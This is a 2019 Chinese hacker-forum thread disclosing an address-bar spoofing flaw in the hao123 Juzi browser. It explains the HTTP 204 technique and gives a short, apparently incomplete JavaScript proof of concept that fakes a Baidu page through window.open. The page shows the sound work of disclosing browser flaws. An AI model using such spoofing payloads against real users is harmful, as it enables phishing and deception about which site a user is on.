查看: 14112|回复: 1

hao123桔子浏览器 – 页面欺骗漏洞

[复制链接]
  • TA的每日心情
    慵懒
    2019-12-9 20:45
  • 签到天数: 15 天

    [LV.4]偶尔看看III

    发表于 2019-7-25 03:21:51 | 显示全部楼层 |阅读模式
    本帖最后由 danko 于 2019-7-25 03:24 编辑
    主要原理伪造URL地址漏洞,HTTP204/205地址栏伪造。

    页面欺骗漏洞函数:

    Window.open()
    document.write()

    通过一个欺骗漏洞,浏览器跳转到一个新的页面,加载了一个无效地址,处于挂起状态,并且未对无效地址做任何处理

    我测试的浏览器浏览器版本:v2.1.0.1037
    HTTP204伪造网站漏洞

    204 No Content(无内容)—-该响应码有时候表明请求已经执行成功但不需要做任何响应。204响应码会中断浏览器的页面跳转,浏览器会保持原URL不变,页面内容也维持原状。

    window.open() 跳转到HTTP 204之后,会更新地址栏,然后通过opener注入

    伪造百度,因为成功跳转,需要伪造一个指定无法访问的端口即可。

    [PHP] 纯文本查看 复制代码
    <a  target="sb">点我</a>
    <script>
    function d(){
    window.open("javascript:location.href='<title>百度搜索</title>www.dankeanquan.com'", "sb");
    }
    </script>
    回复

    使用道具 举报

  • TA的每日心情
    奋斗
    2021-12-20 19:06
  • 签到天数: 554 天

    [LV.9]以坛为家II

    发表于 2019-8-10 10:28:12 | 显示全部楼层
    看着有点蛋疼呀
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-22 16:10 , Processed in 0.037100 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部